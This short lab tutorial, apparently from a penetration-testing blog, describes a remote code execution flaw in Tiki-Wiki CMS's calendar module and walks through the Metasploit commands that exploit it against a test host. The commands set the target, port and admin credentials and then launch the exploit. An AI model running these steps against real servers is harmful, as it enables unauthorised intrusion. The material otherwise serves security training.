Tiki-Wiki CMS’s calendar module contains a remote code execution vulnerability within the viewmode GET parameter. The calendar module is NOT enabled by default. If enabled, the default permissions are set to NOT allow anonymous users to access. Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14 Verified/Tested against 14.1
Exploit Targets
tiki-wiki 14.1
Requirement
Attacker: kali Linux
Victim PC: Linux,Windows
Open Kali terminal type msfconsole
Now type use exploit/linux/http/tiki_calendar-exec
msf exploit (tiki_calendar_exec)>set targeturi /tiki
msf exploit (tiki_calendar_exec)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (tiki_calendar_exec)>set username admin
msf exploit (tiki_calendar_exec)>set password raj123
msf exploit (tiki_calendar_exec)>set rport 81
msf exploit (tiki_calendar_exec)>exploit
The post Exploit Remote Server using Tiki-Wiki CMS Calendar Command Execution appeared first on Hacking Articles.